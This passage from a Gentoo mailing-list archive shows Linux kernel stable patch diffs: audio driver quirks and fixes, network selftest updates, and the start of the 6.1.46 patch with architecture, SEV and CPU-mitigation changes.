+@@ -11868,6 +11952,7 @@ static const struct hda_model_fixup alc662_fixup_models[] = {
+ 	{.id = ALC662_FIXUP_USI_HEADSET_MODE, .name = "usi-headset"},
+ 	{.id = ALC662_FIXUP_LENOVO_MULTI_CODECS, .name = "dual-codecs"},
+ 	{.id = ALC669_FIXUP_ACER_ASPIRE_ETHOS, .name = "aspire-ethos"},
++	{.id = ALC897_FIXUP_UNIS_H3C_X500S, .name = "unis-h3c-x500s"},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/amd/Kconfig b/sound/soc/amd/Kconfig
+index c88ebd84bdd50..3968c478c9381 100644
+--- a/sound/soc/amd/Kconfig
++++ b/sound/soc/amd/Kconfig
+@@ -81,6 +81,7 @@ config SND_SOC_AMD_VANGOGH_MACH
+ 	tristate "AMD Vangogh support for NAU8821 CS35L41"
+ 	select SND_SOC_NAU8821
+ 	select SND_SOC_CS35L41_SPI
++	select SND_AMD_ACP_CONFIG
+ 	depends on SND_SOC_AMD_ACP5x && I2C && SPI_MASTER
+ 	help
+ 	  This option enables machine driver for Vangogh platform
+diff --git a/sound/soc/amd/vangogh/acp5x.h b/sound/soc/amd/vangogh/acp5x.h
+index bd9f1c5684d17..ac1936a8c43ff 100644
+--- a/sound/soc/amd/vangogh/acp5x.h
++++ b/sound/soc/amd/vangogh/acp5x.h
+@@ -147,6 +147,8 @@ static inline void acp_writel(u32 val, void __iomem *base_addr)
+ 	writel(val, base_addr - ACP5x_PHY_BASE_ADDRESS);
+ }
+ 
++int snd_amd_acp_find_config(struct pci_dev *pci);
++
+ static inline u64 acp_get_byte_count(struct i2s_stream_instance *rtd,
+ 				     int direction)
+ {
+diff --git a/sound/soc/amd/vangogh/pci-acp5x.c b/sound/soc/amd/vangogh/pci-acp5x.c
+index e0df17c88e8e0..c4634a8a17cdc 100644
+--- a/sound/soc/amd/vangogh/pci-acp5x.c
++++ b/sound/soc/amd/vangogh/pci-acp5x.c
+@@ -125,10 +125,15 @@ static int snd_acp5x_probe(struct pci_dev *pci,
+ {
+ 	struct acp5x_dev_data *adata;
+ 	struct platform_device_info pdevinfo[ACP5x_DEVS];
+-	unsigned int irqflags;
++	unsigned int irqflags, flag;
+ 	int ret, i;
+ 	u32 addr, val;
+ 
++	/* Return if acp config flag is defined */
++	flag = snd_amd_acp_find_config(pci);
++	if (flag)
++		return -ENODEV;
++
+ 	irqflags = IRQF_SHARED;
+ 	if (pci->revision != 0x50)
+ 		return -ENODEV;
+diff --git a/sound/soc/codecs/rt5665.c b/sound/soc/codecs/rt5665.c
+index 6e66cc218fa8d..76ff097518c88 100644
+--- a/sound/soc/codecs/rt5665.c
++++ b/sound/soc/codecs/rt5665.c
+@@ -4472,6 +4472,8 @@ static void rt5665_remove(struct snd_soc_component *component)
+ 	struct rt5665_priv *rt5665 = snd_soc_component_get_drvdata(component);
+ 
+ 	regmap_write(rt5665->regmap, RT5665_RESET, 0);
++
++	regulator_bulk_disable(ARRAY_SIZE(rt5665->supplies), rt5665->supplies);
+ }
+ 
+ #ifdef CONFIG_PM
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index a37c85d301471..064b6feb76167 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -374,6 +374,31 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)(RT711_JD1),
+ 	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Meteor Lake Client Platform"),
++		},
++		.driver_data = (void *)(RT711_JD2_100K),
++	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Google"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Rex"),
++		},
++		.driver_data = (void *)(SOF_SDW_PCH_DMIC),
++	},
++	/* LunarLake devices */
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lunar Lake Client Platform"),
++		},
++		.driver_data = (void *)(RT711_JD2_100K),
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/intel/boards/sof_sdw_rt711_sdca.c b/sound/soc/intel/boards/sof_sdw_rt711_sdca.c
+index 7f16304d025be..cf8b9793fe0e5 100644
+--- a/sound/soc/intel/boards/sof_sdw_rt711_sdca.c
++++ b/sound/soc/intel/boards/sof_sdw_rt711_sdca.c
+@@ -143,6 +143,9 @@ int sof_sdw_rt711_sdca_exit(struct snd_soc_card *card, struct snd_soc_dai_link *
+ 	if (!ctx->headset_codec_dev)
+ 		return 0;
+ 
++	if (!SOF_RT711_JDSRC(sof_sdw_quirk))
++		return 0;
++
+ 	device_remove_software_node(ctx->headset_codec_dev);
+ 	put_device(ctx->headset_codec_dev);
+ 
+diff --git a/sound/soc/meson/axg-tdm-formatter.c b/sound/soc/meson/axg-tdm-formatter.c
+index 9883dc777f630..63333a2b0a9c3 100644
+--- a/sound/soc/meson/axg-tdm-formatter.c
++++ b/sound/soc/meson/axg-tdm-formatter.c
+@@ -30,27 +30,32 @@ int axg_tdm_formatter_set_channel_masks(struct regmap *map,
+ 					struct axg_tdm_stream *ts,
+ 					unsigned int offset)
+ {
+-	unsigned int val, ch = ts->channels;
+-	unsigned long mask;
+-	int i, j;
++	unsigned int ch = ts->channels;
++	u32 val[AXG_TDM_NUM_LANES];
++	int i, j, k;
++
++	/*
++	 * We need to mimick the slot distribution used by the HW to keep the
++	 * channel placement consistent regardless of the number of channel
++	 * in the stream. This is why the odd algorithm below is used.
++	 */
++	memset(val, 0, sizeof(*val) * AXG_TDM_NUM_LANES);
+ 
+ 	/*
+ 	 * Distribute the channels of the stream over the available slots
+-	 * of each TDM lane
++	 * of each TDM lane. We need to go over the 32 slots ...
+ 	 */
+-	for (i = 0; i < AXG_TDM_NUM_LANES; i++) {
+-		val = 0;
+-		mask = ts->mask[i];
+-
+-		for (j = find_first_bit(&mask, 32);
+-		     (j < 32) && ch;
+-		     j = find_next_bit(&mask, 32, j + 1)) {
+-			val |= 1 << j;
+-			ch -= 1;
++	for (i = 0; (i < 32) && ch; i += 2) {
++		/* ... of all the lanes ... */
++		for (j = 0; j < AXG_TDM_NUM_LANES; j++) {
++			/* ... then distribute the channels in pairs */
++			for (k = 0; k < 2; k++) {
++				if ((BIT(i + k) & ts->mask[j]) && ch) {
++					val[j] |= BIT(i + k);
++					ch -= 1;
++				}
++			}
+ 		}
+-
+-		regmap_write(map, offset, val);
+-		offset += regmap_get_reg_stride(map);
+ 	}
+ 
+ 	/*
+@@ -63,6 +68,11 @@ int axg_tdm_formatter_set_channel_masks(struct regmap *map,
+ 		return -EINVAL;
+ 	}
+ 
++	for (i = 0; i < AXG_TDM_NUM_LANES; i++) {
++		regmap_write(map, offset, val[i]);
++		offset += regmap_get_reg_stride(map);
++	}
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(axg_tdm_formatter_set_channel_masks);
+diff --git a/sound/soc/sof/amd/acp.h b/sound/soc/sof/amd/acp.h
+index dd3c072d01721..14148c311f504 100644
+--- a/sound/soc/sof/amd/acp.h
++++ b/sound/soc/sof/amd/acp.h
+@@ -54,6 +54,9 @@
+ 
+ #define ACP_DSP_TO_HOST_IRQ			0x04
+ 
++#define ACP_RN_PCI_ID				0x01
++#define ACP_RMB_PCI_ID				0x6F
++
+ #define HOST_BRIDGE_CZN				0x1630
+ #define HOST_BRIDGE_RMB				0x14B5
+ #define ACP_SHA_STAT				0x8000
+diff --git a/sound/soc/sof/amd/pci-rmb.c b/sound/soc/sof/amd/pci-rmb.c
+index 4e1de462b431b..5698d910b26f3 100644
+--- a/sound/soc/sof/amd/pci-rmb.c
++++ b/sound/soc/sof/amd/pci-rmb.c
+@@ -90,6 +90,9 @@ static int acp_pci_rmb_probe(struct pci_dev *pci, const struct pci_device_id *pc
+ 	unsigned int flag, i, addr;
+ 	int ret;
+ 
++	if (pci->revision != ACP_RMB_PCI_ID)
++		return -ENODEV;
++
+ 	flag = snd_amd_acp_find_config(pci);
+ 	if (flag != FLAG_AMD_SOF && flag != FLAG_AMD_SOF_ONLY_DMIC)
+ 		return -ENODEV;
+diff --git a/sound/soc/sof/amd/pci-rn.c b/sound/soc/sof/amd/pci-rn.c
+index fca40b261671b..9189f63632789 100644
+--- a/sound/soc/sof/amd/pci-rn.c
++++ b/sound/soc/sof/amd/pci-rn.c
+@@ -90,6 +90,9 @@ static int acp_pci_rn_probe(struct pci_dev *pci, const struct pci_device_id *pci
+ 	unsigned int flag, i, addr;
+ 	int ret;
+ 
++	if (pci->revision != ACP_RN_PCI_ID)
++		return -ENODEV;
++
+ 	flag = snd_amd_acp_find_config(pci);
+ 	if (flag != FLAG_AMD_SOF && flag != FLAG_AMD_SOF_ONLY_DMIC)
+ 		return -ENODEV;
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index 625977a29d8a8..75a1e2c6539f2 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -479,8 +479,10 @@ int snd_sof_device_shutdown(struct device *dev)
+ 	if (IS_ENABLED(CONFIG_SND_SOC_SOF_PROBE_WORK_QUEUE))
+ 		cancel_work_sync(&sdev->probe_work);
+ 
+-	if (sdev->fw_state == SOF_FW_BOOT_COMPLETE)
++	if (sdev->fw_state == SOF_FW_BOOT_COMPLETE) {
++		sof_fw_trace_free(sdev);
+ 		return snd_sof_shutdown(sdev);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/intel/hda.c b/sound/soc/sof/intel/hda.c
+index 1188ec51816bd..63764afdcf617 100644
+--- a/sound/soc/sof/intel/hda.c
++++ b/sound/soc/sof/intel/hda.c
+@@ -1309,12 +1309,22 @@ static void hda_generic_machine_select(struct snd_sof_dev *sdev,
+ 			hda_mach->mach_params.dmic_num = dmic_num;
+ 			pdata->tplg_filename = tplg_filename;
+ 
+-			if (codec_num == 2) {
++			if (codec_num == 2 ||
++			    (codec_num == 1 && !HDA_IDISP_CODEC(bus->codec_mask))) {
+ 				/*
+ 				 * Prevent SoundWire links from starting when an external
+ 				 * HDaudio codec is used
+ 				 */
+ 				hda_mach->mach_params.link_mask = 0;
++			} else {
++				/*
++				 * Allow SoundWire links to start when no external HDaudio codec
++				 * was detected. This will not create a SoundWire card but
++				 * will help detect if any SoundWire codec reports as ATTACHED.
++				 */
++				struct sof_intel_hda_dev *hdev = sdev->pdata->hw_pdata;
++
++				hda_mach->mach_params.link_mask = hdev->info.link_mask;
+ 			}
+ 
+ 			*mach = hda_mach;
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index efb4a3311cc59..5d72dc8441cbb 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -4507,6 +4507,35 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 		}
+ 	}
+ },
++{
++	/* Advanced modes of the Mythware XA001AU.
++	 * For the standard mode, Mythware XA001AU has ID ffad:a001
++	 */
++	USB_DEVICE_VENDOR_SPEC(0xffad, 0xa001),
++	.driver_info = (unsigned long) &(const struct snd_usb_audio_quirk) {
++		.vendor_name = "Mythware",
++		.product_name = "XA001AU",
++		.ifnum = QUIRK_ANY_INTERFACE,
++		.type = QUIRK_COMPOSITE,
++		.data = (const struct snd_usb_audio_quirk[]) {
++			{
++				.ifnum = 0,
++				.type = QUIRK_IGNORE_INTERFACE,
++			},
++			{
++				.ifnum = 1,
++				.type = QUIRK_AUDIO_STANDARD_INTERFACE,
++			},
++			{
++				.ifnum = 2,
++				.type = QUIRK_AUDIO_STANDARD_INTERFACE,
++			},
++			{
++				.ifnum = -1
++			}
++		}
++	}
++},
+ 
+ #undef USB_DEVICE_VENDOR_SPEC
+ #undef USB_AUDIO_DEVICE
+diff --git a/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh b/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh
+index aff88f78e3391..5ea9d63915f77 100755
+--- a/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh
++++ b/tools/testing/selftests/net/forwarding/mirror_gre_changes.sh
+@@ -72,7 +72,8 @@ test_span_gre_ttl()
+ 
+ 	RET=0
+ 
+-	mirror_install $swp1 ingress $tundev "matchall $tcflags"
++	mirror_install $swp1 ingress $tundev \
++		"prot ip flower $tcflags ip_prot icmp"
+ 	tc filter add dev $h3 ingress pref 77 prot $prot \
+ 		flower skip_hw ip_ttl 50 action pass
+ 
+diff --git a/tools/testing/selftests/net/forwarding/tc_actions.sh b/tools/testing/selftests/net/forwarding/tc_actions.sh
+index 919c0dd9fe4bc..b0f5e55d2d0b2 100755
+--- a/tools/testing/selftests/net/forwarding/tc_actions.sh
++++ b/tools/testing/selftests/net/forwarding/tc_actions.sh
+@@ -9,6 +9,8 @@ NUM_NETIFS=4
+ source tc_common.sh
+ source lib.sh
+ 
++require_command ncat
++
+ tcflags="skip_hw"
+ 
+ h1_create()
+@@ -201,10 +203,10 @@ mirred_egress_to_ingress_test()
+ 
+ mirred_egress_to_ingress_tcp_test()
+ {
+-	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
++	mirred_e2i_tf1=$(mktemp) mirred_e2i_tf2=$(mktemp)
+ 
+ 	RET=0
+-	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
++	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$mirred_e2i_tf1
+ 	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \
+ 		$tcflags ip_proto tcp src_ip 192.0.2.1 dst_ip 192.0.2.2 \
+ 			action ct commit nat src addr 192.0.2.2 pipe \
+@@ -220,11 +222,11 @@ mirred_egress_to_ingress_tcp_test()
+ 		ip_proto icmp \
+ 			action drop
+ 
+-	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1  &
++	ip vrf exec v$h1 ncat --recv-only -w10 -l -p 12345 -o $mirred_e2i_tf2 &
+ 	local rpid=$!
+-	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
++	ip vrf exec v$h1 ncat -w1 --send-only 192.0.2.2 12345 <$mirred_e2i_tf1
+ 	wait -n $rpid
+-	cmp -s $tmpfile $tmpfile1
++	cmp -s $mirred_e2i_tf1 $mirred_e2i_tf2
+ 	check_err $? "server output check failed"
+ 
+ 	$MZ $h1 -c 10 -p 64 -a $h1mac -b $h1mac -A 192.0.2.1 -B 192.0.2.1 \
+@@ -241,7 +243,7 @@ mirred_egress_to_ingress_tcp_test()
+ 	tc filter del dev $h1 egress protocol ip pref 101 handle 101 flower
+ 	tc filter del dev $h1 ingress protocol ip pref 102 handle 102 flower
+ 
+-	rm -f $tmpfile $tmpfile1
++	rm -f $mirred_e2i_tf1 $mirred_e2i_tf2
+ 	log_test "mirred_egress_to_ingress_tcp ($tcflags)"
+ }
+ 
+@@ -270,6 +272,8 @@ setup_prepare()
+ 
+ cleanup()
+ {
++	local tf
++
+ 	pre_cleanup
+ 
+ 	switch_destroy
+@@ -280,6 +284,8 @@ cleanup()
+ 
+ 	ip link set $swp2 address $swp2origmac
+ 	ip link set $swp1 address $swp1origmac
++
++	for tf in $mirred_e2i_tf1 $mirred_e2i_tf2; do rm -f $tf; done
+ }
+ 
+ mirred_egress_redirect_test()


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-16 18:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-16 18:32 UTC (permalink / raw
  To: gentoo-commits

commit:     c972607e14a51e876fdd25e5bd58d020f2ca1c0a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 16 17:16:04 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 16 17:16:04 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c972607e

Linux patch 6.1.46

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1045_linux-6.1.46.patch | 6914 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6918 insertions(+)

diff --git a/0000_README b/0000_README
index 93d96552..0e741144 100644
--- a/0000_README
+++ b/0000_README
@@ -223,6 +223,10 @@ Patch:  1044_linux-6.1.45.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.45
 
+Patch:  1045_linux-6.1.46.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.46
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1045_linux-6.1.46.patch b/1045_linux-6.1.46.patch
new file mode 100644
index 00000000..5e1f1095
--- /dev/null
+++ b/1045_linux-6.1.46.patch
@@ -0,0 +1,6914 @@
+diff --git a/Makefile b/Makefile
+index 82c958299e982..bdb965177db52 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 45
++SUBLEVEL = 46
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/alpha/kernel/setup.c b/arch/alpha/kernel/setup.c
+index 33bf3a6270027..45a920ba4921d 100644
+--- a/arch/alpha/kernel/setup.c
++++ b/arch/alpha/kernel/setup.c
+@@ -385,8 +385,7 @@ setup_memory(void *kernel_end)
+ #endif /* CONFIG_BLK_DEV_INITRD */
+ }
+ 
+-int __init
+-page_is_ram(unsigned long pfn)
++int page_is_ram(unsigned long pfn)
+ {
+ 	struct memclust_struct * cluster;
+ 	struct memdesc_struct * memdesc;
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 270742cc3ca49..e737dc8cd660c 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -10,7 +10,6 @@ config LOONGARCH
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG
+ 	select ARCH_ENABLE_MEMORY_HOTREMOVE
+ 	select ARCH_HAS_ACPI_TABLE_UPGRADE	if ACPI
+-	select ARCH_HAS_CPU_FINALIZE_INIT
+ 	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_TICK_BROADCAST if GENERIC_CLOCKEVENTS_BROADCAST
+diff --git a/arch/loongarch/kernel/setup.c b/arch/loongarch/kernel/setup.c
+index 29725b37b35ca..ae436def7ee98 100644
+--- a/arch/loongarch/kernel/setup.c
++++ b/arch/loongarch/kernel/setup.c
+@@ -12,7 +12,6 @@
+  */
+ #include <linux/init.h>
+ #include <linux/acpi.h>
+-#include <linux/cpu.h>
+ #include <linux/dmi.h>
+ #include <linux/efi.h>
+ #include <linux/export.h>
+@@ -81,11 +80,6 @@ const char *get_system_type(void)
+ 	return "generic-loongson-machine";
+ }
+ 
+-void __init arch_cpu_finalize_init(void)
+-{
+-	alternative_instructions();
+-}
+-
+ static const char *dmi_string_parse(const struct dmi_header *dm, u8 s)
+ {
+ 	const u8 *bp = ((u8 *) dm) + dm->length;
+diff --git a/arch/riscv/include/asm/mmio.h b/arch/riscv/include/asm/mmio.h
+index aff6c33ab0c08..4c58ee7f95ecf 100644
+--- a/arch/riscv/include/asm/mmio.h
++++ b/arch/riscv/include/asm/mmio.h
+@@ -101,9 +101,9 @@ static inline u64 __raw_readq(const volatile void __iomem *addr)
+  * Relaxed I/O memory access primitives. These follow the Device memory
+  * ordering rules but do not guarantee any ordering relative to Normal memory
+  * accesses.  These are defined to order the indicated access (either a read or
+- * write) with all other I/O memory accesses. Since the platform specification
+- * defines that all I/O regions are strongly ordered on channel 2, no explicit
+- * fences are required to enforce this ordering.
++ * write) with all other I/O memory accesses to the same peripheral. Since the
++ * platform specification defines that all I/O regions are strongly ordered on
++ * channel 0, no explicit fences are required to enforce this ordering.
+  */
+ /* FIXME: These are now the same as asm-generic */
+ #define __io_rbr()		do {} while (0)
+@@ -125,14 +125,14 @@ static inline u64 __raw_readq(const volatile void __iomem *addr)
+ #endif
+ 
+ /*
+- * I/O memory access primitives. Reads are ordered relative to any
+- * following Normal memory access. Writes are ordered relative to any prior
+- * Normal memory access.  The memory barriers here are necessary as RISC-V
++ * I/O memory access primitives.  Reads are ordered relative to any following
++ * Normal memory read and delay() loop.  Writes are ordered relative to any
++ * prior Normal memory write.  The memory barriers here are necessary as RISC-V
+  * doesn't define any ordering between the memory space and the I/O space.
+  */
+ #define __io_br()	do {} while (0)
+-#define __io_ar(v)	__asm__ __volatile__ ("fence i,r" : : : "memory")
+-#define __io_bw()	__asm__ __volatile__ ("fence w,o" : : : "memory")
++#define __io_ar(v)	({ __asm__ __volatile__ ("fence i,ir" : : : "memory"); })
++#define __io_bw()	({ __asm__ __volatile__ ("fence w,o" : : : "memory"); })
+ #define __io_aw()	mmiowb_set_pending()
+ 
+ #define readb(c)	({ u8  __v; __io_br(); __v = readb_cpu(c); __io_ar(__v); __v; })
+diff --git a/arch/riscv/kernel/elf_kexec.c b/arch/riscv/kernel/elf_kexec.c
+index 5372b708fae21..c08bb5c3b3857 100644
+--- a/arch/riscv/kernel/elf_kexec.c
++++ b/arch/riscv/kernel/elf_kexec.c
+@@ -281,7 +281,7 @@ static void *elf_kexec_load(struct kimage *image, char *kernel_buf,
+ 		kbuf.buffer = initrd;
+ 		kbuf.bufsz = kbuf.memsz = initrd_len;
+ 		kbuf.buf_align = PAGE_SIZE;
+-		kbuf.top_down = false;
++		kbuf.top_down = true;
+ 		kbuf.mem = KEXEC_BUF_MEM_UNKNOWN;
+ 		ret = kexec_add_buffer(&kbuf);
+ 		if (ret)
+@@ -425,6 +425,7 @@ int arch_kexec_apply_relocations_add(struct purgatory_info *pi,
+ 		 * sym, instead of searching the whole relsec.
+ 		 */
+ 		case R_RISCV_PCREL_HI20:
++		case R_RISCV_CALL_PLT:
+ 		case R_RISCV_CALL:
+ 			*(u64 *)loc = CLEAN_IMM(UITYPE, *(u64 *)loc) |
+ 				 ENCODE_UJTYPE_IMM(val - addr);
+diff --git a/arch/x86/boot/compressed/idt_64.c b/arch/x86/boot/compressed/idt_64.c
+index 6debb816e83dc..3cdf94b414567 100644
+--- a/arch/x86/boot/compressed/idt_64.c
++++ b/arch/x86/boot/compressed/idt_64.c
+@@ -63,7 +63,14 @@ void load_stage2_idt(void)
+ 	set_idt_entry(X86_TRAP_PF, boot_page_fault);
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+-	set_idt_entry(X86_TRAP_VC, boot_stage2_vc);
++	/*
++	 * Clear the second stage #VC handler in case guest types
++	 * needing #VC have not been detected.
++	 */
++	if (sev_status & BIT(1))
++		set_idt_entry(X86_TRAP_VC, boot_stage2_vc);
++	else
++		set_idt_entry(X86_TRAP_VC, NULL);
+ #endif
+ 
+ 	load_boot_idt(&boot_idt_desc);
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index d63ad8f99f83a..e65f0968e0d9d 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -354,13 +354,46 @@ void sev_enable(struct boot_params *bp)
+ 	if (bp)
+ 		bp->cc_blob_address = 0;
+ 
++	/*
++	 * Do an initial SEV capability check before snp_init() which
++	 * loads the CPUID page and the same checks afterwards are done
++	 * without the hypervisor and are trustworthy.
++	 *
++	 * If the HV fakes SEV support, the guest will crash'n'burn
++	 * which is good enough.
++	 */
++
++	/* Check for the SME/SEV support leaf */
++	eax = 0x80000000;
++	ecx = 0;
++	native_cpuid(&eax, &ebx, &ecx, &edx);
++	if (eax < 0x8000001f)
++		return;
++
++	/*
++	 * Check for the SME/SEV feature:
++	 *   CPUID Fn8000_001F[EAX]
++	 *   - Bit 0 - Secure Memory Encryption support
++	 *   - Bit 1 - Secure Encrypted Virtualization support
++	 *   CPUID Fn8000_001F[EBX]
++	 *   - Bits 5:0 - Pagetable bit position used to indicate encryption
++	 */
++	eax = 0x8000001f;
++	ecx = 0;
++	native_cpuid(&eax, &ebx, &ecx, &edx);
++	/* Check whether SEV is supported */
++	if (!(eax & BIT(1)))
++		return;
++
+ 	/*
+ 	 * Setup/preliminary detection of SNP. This will be sanity-checked
+ 	 * against CPUID/MSR values later.
+ 	 */
+ 	snp = snp_init(bp);
+ 
+-	/* Check for the SME/SEV support leaf */
++	/* Now repeat the checks with the SNP CPUID table. */
++
++	/* Recheck the SME/SEV support leaf */
+ 	eax = 0x80000000;
+ 	ecx = 0;
+ 	native_cpuid(&eax, &ebx, &ecx, &edx);
+@@ -368,7 +401,7 @@ void sev_enable(struct boot_params *bp)
+ 		return;
+ 
+ 	/*
+-	 * Check for the SME/SEV feature:
++	 * Recheck for the SME/SEV feature:
+ 	 *   CPUID Fn8000_001F[EAX]
+ 	 *   - Bit 0 - Secure Memory Encryption support
+ 	 *   - Bit 1 - Secure Encrypted Virtualization support
+diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
+index 311eae30e0894..1288661397f09 100644
+--- a/arch/x86/entry/vdso/vma.c
++++ b/arch/x86/entry/vdso/vma.c
+@@ -322,8 +322,8 @@ static unsigned long vdso_addr(unsigned long start, unsigned len)
+ 
+ 	/* Round the lowest possible end address up to a PMD boundary. */
+ 	end = (start + len + PMD_SIZE - 1) & PMD_MASK;
+-	if (end >= TASK_SIZE_MAX)
+-		end = TASK_SIZE_MAX;
++	if (end >= DEFAULT_MAP_WINDOW)
++		end = DEFAULT_MAP_WINDOW;
+ 	end -= len;
+ 
+ 	if (end > start) {
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 45bf26862b99b..94ea13adb724a 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -867,4 +867,6 @@ bool arch_is_platform_page(u64 paddr);
+ #define arch_is_platform_page arch_is_platform_page
+ #endif
+ 
++extern bool gds_ucode_mitigated(void);
++
+ #endif /* _ASM_X86_PROCESSOR_H */
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 43910eb55b2e9..239b302973d7a 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -73,6 +73,7 @@ static const int amd_erratum_1054[] =
+ static const int amd_zenbleed[] =
+ 	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x30, 0x0, 0x4f, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0x90, 0x0, 0x91, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0xa0, 0x0, 0xaf, 0xf));
+ 
+ static const int amd_div0[] =
+diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
+index fd03f5a1f0ef0..e6939ebb606ab 100644
+--- a/arch/x86/kernel/vmlinux.lds.S
++++ b/arch/x86/kernel/vmlinux.lds.S
+@@ -514,11 +514,17 @@ INIT_PER_CPU(irq_stack_backing_store);
+ 
+ #ifdef CONFIG_CPU_SRSO
+ /*
+- * GNU ld cannot do XOR so do: (A | B) - (A & B) in order to compute the XOR
++ * GNU ld cannot do XOR until 2.41.
++ * https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=f6f78318fca803c4907fb8d7f6ded8295f1947b1
++ *
++ * LLVM lld cannot do XOR until lld-17.
++ * https://github.com/llvm/llvm-project/commit/fae96104d4378166cbe5c875ef8ed808a356f3fb
++ *
++ * Instead do: (A | B) - (A & B) in order to compute the XOR
+  * of the two function addresses:
+  */
+-. = ASSERT(((srso_untrain_ret_alias | srso_safe_ret_alias) -
+-		(srso_untrain_ret_alias & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
++. = ASSERT(((ABSOLUTE(srso_untrain_ret_alias) | srso_safe_ret_alias) -
++		(ABSOLUTE(srso_untrain_ret_alias) & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
+ 		"SRSO function pair won't alias");
+ #endif
+ 
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 4cb2e483db533..e0437acb5cf75 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -2410,15 +2410,18 @@ static void sev_es_sync_from_ghcb(struct vcpu_svm *svm)
+ 	 */
+ 	memset(vcpu->arch.regs, 0, sizeof(vcpu->arch.regs));
+ 
+-	vcpu->arch.regs[VCPU_REGS_RAX] = ghcb_get_rax_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RBX] = ghcb_get_rbx_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RCX] = ghcb_get_rcx_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RDX] = ghcb_get_rdx_if_valid(ghcb);
+-	vcpu->arch.regs[VCPU_REGS_RSI] = ghcb_get_rsi_if_valid(ghcb);
++	BUILD_BUG_ON(sizeof(svm->sev_es.valid_bitmap) != sizeof(ghcb->save.valid_bitmap));
